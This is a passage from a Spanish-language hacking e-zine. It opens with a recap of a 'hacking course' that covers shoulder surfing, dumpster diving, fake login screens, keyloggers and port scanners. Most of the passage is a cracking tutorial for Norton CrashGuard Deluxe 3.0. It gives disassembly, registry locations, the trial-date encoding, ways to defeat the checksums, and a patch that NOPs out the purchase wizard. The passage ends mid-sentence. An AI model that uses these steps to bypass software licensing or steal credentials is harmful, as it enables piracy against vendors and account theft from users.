tecnica y ademas seguir los pasos explicados en el numero 1§ del ezine, ya que tenemos que tener mucho cuidado de lo que decimos y de quien nos hacemos pasar, ya que nos podriamos delatar. El capitulo II esta enfocado a tecnicas hacker utilizando el ordendaor como herramienta, me estoy refiriendo logicamente a: Shoulder Surfing, Trashing, Pantallas Falsas y Key Recorder. Ahora explicaremos cada una de las diferentes tecnicas. Shoulder Surfing es sencillamente mirrar por encima del hombro cuando una persona esta metiendo su login y password para entrar en su cuenta. Trashing cuando 'cotilleamos' la basura de un ISP, Telefonica, etc... con el fin de obtener alguna informacion util para hackear. Las Pantallas Falsas son cuando escribimos un peque¤o programa que simula la conexion a un servidor y cuando la victima introduce su login y password, estos quedan grabados para nuestro posterior uso. Los Key Recorder son parecidos a las Pantallas Falsas, ya que eston son unos peque¤os programas que se dejan residentes en memoria para que vaya grabando las teclas que los usuarios pulsen. Logicamente aqui solo he definido de manera sencilla el uso de las diferentes tecnicas, para profundizar en la materia conviene leerse otra vez el numero II del ezine. El capitulo III se dedico a una interesante y util herramienta de un hacker, me estoy refiriendo al scaneo de puertos, ya que esto nos sera de gran ayuda para buscar bug's en los servidores y poder colarnos o taparlos :). Es conveniente tener a mano un listado de los puertos, como el que se incluyo en el ezine III y tb disponer de varios tipos de scaners como por ejemplo para scanear puertos, sub-dominios, etc... Al igual que antes para coger mas soltura leerse el capitulo III. - Aqui Os Pongo Un Listado De Diferentes Scaners Que Os Pueden Ser Utiles. #ident-scan.c #ftp-scan.c #jakal.c #strobe103_tar.gz #scan.sh #statd-scan.c #udpscan.c El capitulo IV junto con el III consiste en analisis de servidores, en esta entrega vimos como utilizar diferentes comandos del s.o. Unix/Linux para obtener informacion de un servidor remoto. Siendo muy util tanto para un hacker como para un Administrador. Tengo que confesar que no explique todos los comandos que nos pueden ser utiles para un analisis pero si lo explico todo, entonces no tiene gracia y como es bien sabido 'Un hacker se hace a si mismo a base de estudio y paciencia'. Tambien deciros que para aplicar estos metodos de analisis conviene saber Unix/Linux ya que sino, si solo plagiamos los comandos explicados, no sabemos que hacen exactamente y no queremos aprender nada mas, entonces no llegaremos muy lejos y ni siquiera seremos un intento de hacker. Ahora ya creo que las dudas que hubiese podido haver han desaparecido, pero lo conveniente seria volverse a leer los capitulos que no hayan quedado claros y por supuesto experimentar con lo aprendido. Desde estas lineas quiero hacer un llamamiento a aquellos lectores que sigan el curso y consigan resultados positivos para que nos envien un mail poniendo en el subject :'Curso Hack JJF' y asi lo pondre aqui para que todos lo vean, incluso si has creado algo nuevo, pues mucho mejor :) Para los paranoicos tenemos a disposicion la llave publica PGP de - J.J.F. / HACKERS TEAM -. Pues viene el tipico rollo pero que nos puede ser muy util, es el bocabulario tecnico que hemos estado usando en el curso. - Un Poco De Bocabulario Tecnico. #C: Lenguaje de programacion general. #Hacker: Persona que disfruta explorardo nuevos usos en la tecnologia por puro placer, jamas con fines delictivos. #Hacking: Accion realizada por un hacker. #Ingenieria Social: Tecnica por el cual un hacker enga¤a a una persona para sacarle informacion privilegiada. #Key Recorder: Programa el cual graba las teclas que van siendo pulsadas. #Linux: Sistema Operativo semejante al Unix el cual es gratis. #Pantallas Falsas: Tecnica o Programa el cual simula la conexion a un servidor para interceptar login y password. #PGP: Pretty Good Privacy. Programa de criptografia el cual no puede ser desencriptado actualmente. #Puerto: Medio por el cual un servicio de un servidor se comunica con el cliente. #Shoulder Surfing: Tecnica que consiste en mirrar por el encima del hombro. #S.O.: Sistema Operativo. #Trashing: Tecnica en la cual se cotillea la basura fisicamente para obtener informacion util. #Unix: Sistema Operativo, que cual es multitarea y multiusuario. Bueno chicos, esto es todo por hoy y ya en el proximo capitulo haremos algo mas interesante, pero como debeis comprender estos capitulos de repaso son necesarios. Byes all y hasta la vista !! CONDE VAMPIRO - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> -->>-> CORTA HISTORIA DEL TIEMPO <-<<-- Norton CrashGuard Deluxe 3.0 TIPOS DE PROTECCIONES TEMPORALES UN POCO DE TEORIA EN BUSCA DE LA FRASE MAGICA EL REGISTRO DEL SISTEMA COMO CRACKEAR Norton CrashGuard Deluxe 3.0 PRIMERA EXPLORACION PRIMERA SORPRESA SEGUNDA SORPRESA LA APROXIMACION DIFICIL AL ATAQUEEEEEEEEEEEEEE LA FECHA DE CADUCIDAD CHECKSUMS PARAINOCOS CHECKSUMS HASTA EN LA SOPA LA MISMA PROTECCION EN TODOS SITIOS LA APROXIMACION FACIL REUNIENDO LAS PIEZAS LA COMPRA VIRTUAL MODIFICANDO EL REGISTRO MODIFICACIÓN DE LA VARIABLE DEL REGISTRO DEL SISTEMA MORALEJA Saludos Familia. Bastante tiempo desde mi ultimo articulo, los se, pero ya estamos de vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un poco de teoria y lo aprendido lo aplicaremos al programa Noton Uncrash Deluxe desde dos puntos de vista, el temporal y el de la password pa registrarse. TIPOS DE PROTECCIONES TEMPORALES Demos un peque repaso a los diferentes esquemas de proteccion temporal que nos podemos encontrar (recomiendo la lectura del Capitulo 4.1 de +ORC ) - CINDERELLA. El programa funciona durante una cierto periodo de dias (digamos 15 dias) comenzando desde la fecha de instalacion. - BEST_BEFORE. El programa funciona durante una cierto periodo de tiempo independientemente de la fecha de instalacion. El programa caduca el 30/12/97. - COUNTDOWN. El programa funciona solo durante unos minutos o unos segundos. - QUIVER. El programa funciona solo durante un numero determinado de ejecuciones. Realmente no es una proteccion temporal, pero su esquema de proteccion se parece mucho al de los otros tres tipos. UN POCO DE TEORIA Analizemos como funciona una proteccion temporal. Los "inteligentes programadores" ofertan sus productos completos al publico con ridiculas protecciones. Le colocan una fecha de caducidad, pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo las grandes compa¤ias como Micro$oft, Corel, o Symantec. La idea es distribuir masivamenete sus productos aprovechando los estupendos canales de distribucion que ofrecen las revistas de Soft. Una vez inundado el mercado, el usuario disfrutara del producto, se acostumbrara a el, hasta que le sea indispensable y tenga que comprarlo a un precio desorbitado. Esta tactica no es nueva, sino preguntad a algun camello, o como la CIA distribuyo la heroina entre el Black Power. Pensemos un poco. ¨Como conoce el programa que ya ha caducado el periodo de evaluacion?. Supongamos que tenemos una evaluacion e 15 dias e instalamos nuestro programa el 1 de febrero. Sumando la fecha de instalacion (1 Febrero) mas el periodo de prueba se obtiene la fecha de caducidad:15 febrero (El dia en el que lo instalas cuenta como dia habil). El programa, lo primero que calcula es si la fecha actual es menor o igual que la fecha de caducidad, y en tal caso, se ejecuta normalmente. Si es mayor, dara un bonito mensaje "El periodo de evaluacion ha expirado". Una cosa esta clara, el programa debe guardar alguna de las dos fechas siguientes (o las dos): A - Fecha de Instalacion y el periodo de evaluacion. B - Fecha de caducidad. Lo normal es la opcion B. Al instalarse el programa, se calcula la fecha de caducidad y se guarda en algun sitio. Normalmente se guarda en el registro del sistema bajo algun nombre estupido, aunque se puede guardar en el win.ini, system.ini, fichero oculto, o algun fichero que parezca inofensivo. Lo cierto es que debe guardarlo. Existe una variante, y es que la fecha de caducidad este dentro del ejecutable. Un ejemplo lo tenemos en la evaluacion del Hotmetal 4.0., del tipo BEST_BEFORE, que dentro de su ejecutable aparecia 31/12/97. Madre de Mitra, que estupidos pueden llegar a ser los zombi-programadores. Dependiendo de la pericia del programador la fecha de caducidad puede estar o no encriptada para ocultarla de la vista del usuario y para que sea dificil modificarla. Resumiendo, el programa debe guardar la fecha de caducidad y comprobarla al inicio del programa con la fecha actual. Ya sabemos de donde saca la fecha de cadudidad, pero, ¨de donde saca la fecha actual?. Normalmente (el 99% de las veces) se extrae con una llamada a la funcion getlocaltimeo o getsystemtime. Pero se puede extraer viendo la fecha de algun fichero que se modifique periodicamente como el system.dat o el bootlog.txt. Los puntos de ataque a este esquema son claros: - Atacar en el calculo de la fecha de caducidad. En vez de sumar 15 dias sumamos 15 siglos. Esta aproximacion es dificil por que el calculo se realiza una unica vez, generalmente en la instalacion. - Modificar la fecha de caducidad. Si la fecha esta encriptada, necesitariamos construir un algoritmo de encriptacion para la nueva fecha que deseemos introducir. Por lo que en general, puede ser complicado. - Forzar la caducidad del programa. Se analizan los mensajes que da el programa y a partir de ellos se le sigue la pista hacia atras. Es una tactica muy utilizada. - Atacar en la comprobacion de la fecha actual y la fecha de caducidad. Simplemente modifica la comprobacion para que siempre estemos en el periodo de evaluacion. Esta es una opcion elegante. Alguien podria pensar que si se echa pa tras el reloj de W95, la proteccion temporal se elimina. Para evitar esta "trampilla", los programadores colocan codigo como el siguiente: SI esta activada la marca de caducidad ENTONCES el programa ha caducado y se finaliza el programa DE LO CONTRARIO SI fechaActual>fechaCAducidad ENTONCES activar marca de caducidad Como veis si os pasais de la fecha de caducidad, se activa una marca que impedira que se ejecute el programa aunque modifiqueis el reloj. Esta marca se guarda en los mismos sitios donde se guarda la fecha de caducidad. A veces, la proteccion temporal queda eliminada introduciendo una palabra clave, por lo que a veces es mas rapido atacar por la password. Para averiguar el fichero que contiene la proteccion temporal, se puede usar el SoftIce y poner un bpx getlocaltime, o bien una nueva tecnica, muy util no solo para protecciones temporales. Veamosla. EN BUSCA DE LA FRASE MAGICA Todos los mensajes de un programa, los de error, los de felicitacion, los de aviso, no son mas que cadenas de caracteres que deben de residir en un fichero. Para protecciones temporales es util buscar mensajes como 'expire', 'demo', 'evaluation'. Si localizamos estos mensajes habremos localizado, generalmente, el fichero que contiene la proteccion y podemos desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con buscar los mensajes 'unregistered', 'register' para localizar el programa con la proteccion en esquemas por palabra clave. Recomiendo una herramienta excelente para buscar cadenas, es el programa sr32.exe, Search & Replace for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajaoslo y crackearlo, tiene una bonita y sencillota proteccion del tipo CINDERELLA. EL REGISTRO DEL SISTEMA El Registro del Sistema no es mas que un fichero gigante (system.dat) donde W95 y el esto de los programas dejan sus miserias, osea, sus variables, sus parametros de configuracion, su fecha de caducidad, sus marcas de caducidad. Muchos cracks solo necesitan modificar adecuadamente el system.dat Es muy conveniente que le echeis un vistazo, aprendereis mucho y podreis modificar muchos de los parametros del Windoze. Para editar el registro, se utiliza normalmente el programa regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo que lo ejecuteis con el parametro /v ,osease, c:\windows\regedit /v COMO CRACKEAR Norton CrashGuard Deluxe 3.0 Objetivo: Norton Uncrash Deluxe. Version: 3.0 Nombre del ejecutable: ncgd3w95.exe Website: http://www.symantec.com Tama¤o del ejecutable: 11.964.671 bytes. Tipo de proteccion: Cindirella Dificultad: Medio. Tiempo de crackeo: 2 horas. Herramientas: W32dasm8.X, SoftIce. En esta ocasion, nuestro objetivo es una gran y abominable compa¤ia, la Symantec y uno de sus muchos y abominables producto: Norton CrashGuard Deluxe 3.0 Basicamente, el programa consigue, en algunas ocasiones, que las aplicaciones que se cuelgan no bloqueen al Windoze. Cosa de agradecer dado el alto indice de siniestralidad de las aplicaciones y del propio Windoze. Ademas de tener una B.D de informacion sobre el PC, una antivirus ... Se protege con proteccion temporal CINDERELLA de 30 dias. PRIMERA EXPLORACION Instalamos el programa y antes de finalizar la instalacion ya nos pide que nos registremos, mal asunto, quieren cobrar antes de que probemos su producto, su codicia de palpa ante incluso de ver el programa. Una vez instalado, nos ha metido a escondidas varias cosas: - Una Dll con un extra¤o nombre: 30vfv6vn.sys situada en el raiz de la unidad c: El nombre varia en cada instalacion, solo permanece fijo *fv6vn.sys, los 3 primeros caracteres son variables. Sospecho que solo es un indicador para ver si el programa ya ha sido instalado. - Una aplicacion en el arranque del Windoze Norton CrashGuard Deluxe Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicacion por dos veces con el nombre de checkup Su mision es detectar cualquier cambio en el reloj del sistema para bloquear inmediatamente la aplicacion si nos pasamos de la fecha de caducidad. Ademas se crean dos directorios Norton CrashGuard y Norton CrashGuard Deluxe y nos aparece un bonito icono en el escritorio del Windoze con forma de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si fuera poco, dos iconos en la barra de tareas, la aplicacion propiamemte dicha (escudo gris con una N en azul) y una historia de los cuelges de los programas (un reondel con una marca de verificacion). Si pulsamos en el icono del escritorio nos aparece una ventana donde nos dice que nos compremos INMEDIATAMENTE la aplicacion a un precio fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el numero de dias que restan para el programa deje de funcionar. Ademas aparecen unos bonitos botones en los que nos podemos registrar por Internet, probar el producto o cancelar. Si probamos el producto, aparece la ventana principal con todas pas opciones. Si elegimos la opcion de registro, aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta de credito. PRIMERA SORPRESA El sistema de pago no es de la propia Symantec, sino de la empresa Release Software Corporation:http://www.releasesoft.com) y su programa SalesAgen. Es la primera vez y veo que Symantec no controle todos los aspectos de una aplicacion. SEGUNDA SORPRESA El fichero a estudiar es el Norton CrashGuard\cgmain.exe (229.376 bytes) por una simple razon, tiene el unico fichero que tiene el icono que el del programa principal que aparece en la barra de tareas. Pero, en el mismo directorio aparece un extra¤o fichero llamado cgmain.dl_ (743.936 bytes). Mu raro, una libreria aparentemente comprimida (y por tanto no utilizada) con un tama¤o mas grande que el ejecutable. Por que no esta descomprimida la libreria, ¨quizas por que no estamos registrados? :-) Ademas aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu parecido al fichero del programa que estamos analizando cgmain.exe y tiene un icono que tiene las letras RS, que curioso, justo las Iniciales del la empresa que dedica a comercializar el producto: Release Software. Si intentamos ejecutar cgmaipop.exe aparece que esta preparando el Software. PREPARANDO?, ¨es que hay que precalentar los programas antes de instalarlos?. Luego aparece un mensaje de error indicando que no podemos ejecutar la aplicacion, ¨quizas por que no estamos registrados? :-) Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un nombre muy parecido al de la aplicacion que queremos estudiar y aproximadamente con el mismo tama¤o. Y el colmo, en el otro directorio, donde reside el menu de la aplicacion Norton CrashGuard Deluxe\CGDeluxe.exe aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll. Analogamente para Norton CrashGuard Deluxe\checkup.exe (el programa de testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll Todo esto huele a chamusquina, seguro que estos ficheros tienen algo que ver a la hora de registrar el programa, y como veremos en la segunda pate del articulo, tienen que ver y MUCHO. LA APROXIMACION DIFICIL AL ATAQUEEEEEEEEEEEEEE Podriamos analizar esos extra¤os ficheros que han aparecido, y lo haremos en la segunda parte del articulo. Ahora atacaremos formalmente a Norton CrashGuard\cgmain.exe para analizar su esquema CINDERELLA de 30 dias. Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5) Name: GetLocalTime. Bien, bien, asi que, aparentemente, esta usando la tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza, estaremos en plena rutina de comprobacion de fecha: fechaActual>fecha de caducidad? Solamente aparece la funcion getlocaltime que es utilizada una vez en el programa(¨por que lo ponen tan facil?) * Referenced by a CALL at Addresses: |:0040D5B4 , :0040DA44 , :0040DD3F; La rutina es llamada 3 veces :0041E200 81ECCC000000 sub esp, 000000CC :0041E206 8D442410 lea eax, dword ptr [esp+10] :0041E20A 50 push eax * Reference To: KERNEL32.GetLocalTime, Ord:00F5h | :0041E20B FF15BC544400 Call dword ptr [004454BC] :0041E211 8D4C2400 lea ecx, dword ptr [esp] :0041E215 51 push ecx * Reference To: KERNEL32.GetSystemTime, Ord:0135h | :0041E216 FF15B8544400 Call dword ptr [004454B8] ..... Ademas aparece la llamada tambien a GetSystemTime. Tras la llamada a GetSystemTime los valores de a¤o, mes, dia,.... son extraidos de la pila y guardados en los registros :0041E21 mov dx, word ptr [esp+0A] De los registros pasan a unas variables globales :0041E2AA mov dword ptr [0042F7F0], edx Recordad, cualquier posicion de memoria fija como [0042F7F0], es utilizada como variable global por el programa. Despues se reintroducen en la pila el a¤o, el mes, el dia,.... y se llama a la rutina :0041E310 call 00423420. En esta rutina es donde se realiza la encriptacion de la fecha,al finalizar, devuelve en eax la fecha encriptada y ademas de guardarse en :0041E323 mov dword ptr [ecx], eax Es mas, las tres llamadas a :0041E200 obtendran en eax la fecha encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo como es la rutina de encriptacion. Simplemente decir que utiliza la siguiente formula : t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+ (secondsDay*daysMonth[month])+(secondsYear*(year-1900))+(secondsDay*(( (year-1900)-1)/4)); fin=(t+fixValue); Siempre es mas facil comparar un numero que comparar a¤os, dias, meses,... por eso la fecha se transforma en un numero. He construido un peque¤o programa NORTON.EXE en C que realiza todo el proceso de encriptacion de la fecha. Bien, lo logico, es que una vez encriptada la fecha se compruebe con la fecha de caducidad que debe estar encriptada. Si analizamos las tres llamadas a :0041E200 tenemos: * La llamada desde :0040D5B4, se limita a guardar la fecha encriptada :0040D641 mov dword ptr [esi+000002AC], eax * La llamada desde :0040DA44, :0040DD3F hacen practicamente lo mismo, mueven la fecha encriptada que estaba en eax a un registro, hacen una llamada a call 40DC40 y despues comprueban la fecha encriptada con [edi+00000284] En concreto para la llamada desde :0040DD3F :0040DD4B mov ebx, eax :0040DD62 push ebx :0040DD63 call 0040DC40 :0040DD7B cmp dword ptr [edi+00000284], ebx :0040DDBF ja 0040DDE4 En concreto para la llamada desde :0040DA44 :0040DA54 mov edi, eax :0040DA5F push edi :0040DA60 call 0040DC40 :0040DAB2 cmp dword ptr [ebx+00000284], edi :0040DAB8 ja 0040DACE Esto suena a una doble comprobacion temporal, seran desconfiados estos chicos. ¨Pero que hace la llamada a call 0040DC40?, para ello cerramos el cgmain.exe: boton derecho sobre el icono de la N y el escudo y exit. Abrimos el loader del Softice y seleccionamos Norton CrashGuard\cgmain.exe y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice, pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el programa y prestamos atencion a ebx que es el que contiene la fecha encriptada. La llamada a call 0040DC40 simplemente realiza la siguiente comprobacion :0040DC56 cmp edx, eax; compara fechaAnterior,fechaActual :0040DC58 ja 0040DC64; Salta si eres un mal chico. fechaAnterior es la fecha encriptada el la que se arranca por ultima vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200. Es una simple comprobacion para ver si hemos echado para atras el reloj. La comprobacion cmp dword ptr [ebx+00000284], edi; Analogamente cmp dword ptr [edi+00000284], ebx ja 0040DACE; Analogamente ja 0040DDE4 Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el periodo de prueba. LA FECHA DE CADUCIDAD La pregunta es, ¨de donde se guarda la fecha de caducidad encriptada?. Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha de encriptacion se guarda en el registro del sistema y es recuperada por la llamada a la funcion :40BD89 RegqueryValueEXA. En concreto, se guarda en HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write En mi caso, el valor de write es: 01 02 03 04 05 06 07 08 01 00 00 00 05 B7 FF FF F8 02 00 00 00 00 00 00 10 00 03 08 00 00 00 08 00 00 00 04 00 00 00 06 B3 36 71 A1 05 FB 0F 81 A5 20 80 00 06 06 B7 9F A9 A0 00 00 00 00 07 00 00 00 06 B3 36 71 A0 08 C3 28 00 00 18 00 00 00 09 00 00 00 00 00 La fecha de caducidad esta en write(5,7) hasta write(6,5) ambos inclusive. Lo curioso, es que la fecha esta codificada, por ejemplo si la fecha de caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La rutina de encriptacion esta en :40C0D6 y se basa en la operacion or :0040C0D6 8A18 mov bl, byte ptr [eax] :0040C0D8 8A11 mov dl, byte ptr [ecx] :0040C0DA C0E305 shl bl, 05 :0040C0DD 48 dec eax :0040C0DE C0EA03 shr dl, 03 :0040C0E1 49 dec ecx :0040C0E2 0ADA or bl, dl :0040C0E4 4E dec esi :0040C0E5 885101 mov byte ptr [ecx+01], dl :0040C0E8 885901 mov byte ptr [ecx+01], bl He creado dos programas DECODE que decodifica el valor de write y CODE que codifica un valor de fecha para introducirlo en write. CHECKSUMS PARAINOCOS Los puntos de ataque son claros 1.- Parchear las comprobaciones en el ejecutable. 2.- Introducir una fecha caducidad en el a¤o 30000. 1.- Si parcheamos el programa, se produce un error tan gordo que se casca windows. Esto se puede deber a que hemos crackeado mal obien exite un checksum. Para salir de dudas, basta con modificar alguna cadena de caracteres del ejecutable original Por ejemplo "not be run in DOS mode" lo pasamos a "not be RUN in DOS mode", si se casca es que hay un checksum, como en este caso. Un checksum es una comprobacion para ver si el ejecutable se ha modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y guardando este valor algun sitio (ejecutable, registro del sistema). El programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba la suma con el valor que tenia guardado. Si hay algun problema es que un virus o un cracker ha modificado el programa y esto nunca es bueno para el programador. En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos parecia tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe encriptados (de ahi que tuvieran un tama¤o tan parecido ambos ficheros). La rutina de checksum, simplemente consiste en coger de 16 en 16 los bytes del cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero cgmaitky.dll. Si existe alguna diferencia se produce un error de proteccion general y se casca todo. Para complicarlo todo, las rutinas de comprobacion (ver si los 16 bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no estan metidas en un bucle, sino que estan a lo extenso. Es decir, hay una rutina de comprobacion para los 16 primeros bytes, otra disinta para los 16 siguientes. Si queremos parchear el checksum, habra que modificar unas 30 comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al checksum :0040862D jne 00408695 si obligamos a saltar siempre, evitamos el checksum. PERO, ¨POR QUE EXISTE UN FLAG PARA EVITAR EL CHECKSUM?, ¨es que el programa cgmain.exe va a modificarse? Como veremos mas tarde, asi ocurrira. 2.- Con el programa NORTON se crea la fecha de caducidad que queremos, con el programa CODE se encripta y ya solo hay que introducir el resultado en HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write en las posiciones write(5,7),write(6,5) CHECKSUMS HASTA EN LA SOPA Cuando la fecha de caducidad ha vencido, el programa deja de funcionar parcialmente, si analizamos el porque descubrimos que el byte [esi+00000568] controla todo el meollo. En concreto, Si [esi+00000568] = 02 You cannot Run this Application Si [esi+00000568] = 20 Your computer application source has changed Si [esi+00000568] = 08 Your free trial period is over Si [esi+00000568] = 04 OK Pero, ¨como se rellena este byte?. Siguiendo la pista hacia atras descubrimos que se carga a partir de HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open 00 01 02 03 04 05 06 07 1 00 00 00 00 30 00 00 00 2 00 00 00 00 00 00 10 00 3 08 08 00 00 20 00 00 00 4 00 00 00 00 00 00 00 00 En concreto de write(3,4). Hay que tener cuidado por que esta encriptado, asi que hay que utilizar el programa DECODE. Osea , si en write(3,4)=20 indica que al desencriptarlo [esi+00000568]=4. Si write(3,4)=40 la fecha de caducidad ha vencido. Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el programa replica diciendo que hemos trampeado los recursos. ¨QUE PASA AQUI?. Mu facil, HAY UN CHECKSUM en la seccion HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open. Estos es paranoico, un checksum en el propio registro del sistema. En concreto, el checksum esta en write(1,4). Se deja como ejercicio localizar y destruir este checksum. LA MISMA PROTECCION EN TODOS SITIOS Aunque parezca increible, los ficheros CGDeluxe.exe y CheckUp.exe tienen exactamente la misma proteccion que cgmain.exe y ademas en los mismos offset, osea en las mismas direcciones de memoria. Esto es extremadamente extra¤o, asi que adoptaremos otra via de ataque. LA APROXIMACION FACIL Veamos lo que tenemos: - Unos ficheros extra¤os asociados a los ficheros importantes. Sabemos la funcion de uno de ellos los *tky.dll sirven de checksum, pero y el resto para que sirven? - Un flag que desactiva el checksum del ejecutable. - Unos misteriosos fichero ejecutables con el logo RS que dicen que tiene que prepara el Sotware. Nos centraremos en los ejecutables con los logos RS. REUNIENDO LAS PIEZAS Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero, CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una libreria de un gran tama¤o , CGDeluxe.dl_ ,y un ejecutable CGDelpop.exe que "prepara el Software". No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara" de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a CGDeluxe.EXE. Esta "preparacion" solo se realiza cuando estamos registrados. Por tanto, se parte de un archivo ejecutable de un tama¤o inferior a la version completa del programa. Una vez realizado el proceso de compra se activa otro ejecutable que convierte la version de prueba en version completa . Todas las demas utilidades que acompa¤an al Norton CrashGuard Deluxe tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_, Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll) LA COMPRA VIRTUAL Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en nuestra "Primera Aproximacion" : Doble click en el escudo con la N que hay en el escritorio y al pulsar el boton Buy Now (comprar ahora) aparece el asistente de compra. Este sera nuestro punto de entrada. Si pensamos un poco observaremos que la aplicacion que lanza el proceso de compra debe saber si la compra ha tenido exito o no. Por tanto, sera por aqui por donde centremos nuestros esfuerzos. Ademas debe de anunciar de alguna forma al resto de utilidades que la compra ha tenido exito para que ellas tambien se "preparen" Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el icono del escritorio) y observaremos como "compra". Nada mejor que usar un desensamblador para investigar el programa CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso de la libreria comercial RSAGNT32.DLL (encargada de realizar la compra virtual) y que existen un referencias a funciones tales como SAInitialize, startSalesAgent. Estas van a ser nuestras funciones de aproximacion. Pulsamos en el boton de Imported Functions (Imp Fn) y hacemos doble click en la linea de rsagnt32.startSalesAgent. Aparecera en el listado lo siguiente: * Reference To: rsagnt32.startSalesAgent, Ord:000Eh :00407834 E807F30000 Call 00416B40 ß Llamada al asistente :00407839 83C408 add esp, 00000008 :0040783C 66833D0425430000 cmp word ptr [00432504], 0000 :00407844 742B je 00407871 Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que nos encontramos en un bloque de codigo que se encarga de cargar, iniciar, ejecutar, terminar el asistente de compra. Buscamos donde puede empezar el bloque. Y un poco mas arriba encontramos: ///////////// INICIO DE BLOQUE //////////////// * Referenced by a CALL at Address: :00406752 <- desde aqui es llamado el bloque del asistente de compra :004077B0 A1B07B4300 mov eax, dword ptr [00437BB0] :004077B5 53 push ebx : : : : * Reference To: rsagnt32.startSalesAgent, Ord:000Eh <- Aqui hemos comenzado la busqueda :00407834 E807F30000 Call 00416B40 <- Llamada al asistente :00407839 83C408 add esp, 00000008 :0040783C 66833D0425430000 cmp word ptr [00432504], 0000 :00407844 742B je 00407871 :00407846 BFE0A54300 mov edi, 0043A5E0 : : : : :00407878 5F pop edi :00407879 5E pop esi :0040787A 5B pop ebx :0040787B C3 ret ///////////// FIN DE BLOQUE //////////////// Ahora una vez que conocemos desde donde hemos llamado al bloque, usamos el menu Goto -> Goto Code Location y escribimos el desplazamiento 406752. Aqui observamos lo siguiente: * Possible Reference to String Resource ID=00001: "Turnkexe" :00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001 :00406752 E859100000 call 004077B0 <- Entrada en el bloque anterior :00406757 66392D04254300 cmp word ptr [00432504], bp :0040675E 0F84F4010000 je 00406958 :00406764 BF34254300 mov edi, 00432534 Ummmma. Aqui ya tenemos una bonita direccion de memoria (variable global) para usar con Softice.Pero antes a¤adamos la libreria RSAGNT32.DLL. al la lista de dll que sabe manejar el Softice. Abrimos el Symbol Loader de Softice y en el menu Edit -> Softice Initialization Settings -> Exports a¤adimos RSAGNT32.DLL. Abrimos el Symbol Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce: Bpx 406752 Bpx startSalesAgent Pulsamos F5 y cuando aparezca la ventana de "Welcome to Symantec Trialware" pulsamos sobre el boton "Buy Now". Aparecer en el Softice en el primer breakpoint Bpx 406752 Seguimos ejecutando, paramos en la funcion startSalesAgent cs:00407834 E807F30000 Call rsagnt32!startSalesAgent <- Asistente de compra cs:00407839 83C408 add esp, 00000008 cs:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 cs:00407844 742B je 00407871 <- si salta, has comprado Nopeamos el asistente de compra. Esto es, sustituimos la llamada por instrucciones inonfesivas. En : 00407834 90 90 90 90 90 Si estudiamos je 00407871 y hacemos que no vaya a la direccion 407871 aparece una ventana contandonos que se ha grabado un archivo llamado Rslicens. txt pero esto no hace que se active el proceso de compra, este nos es el camino. Otra comparacion interesante se encuentra despues de la rutina de entrada 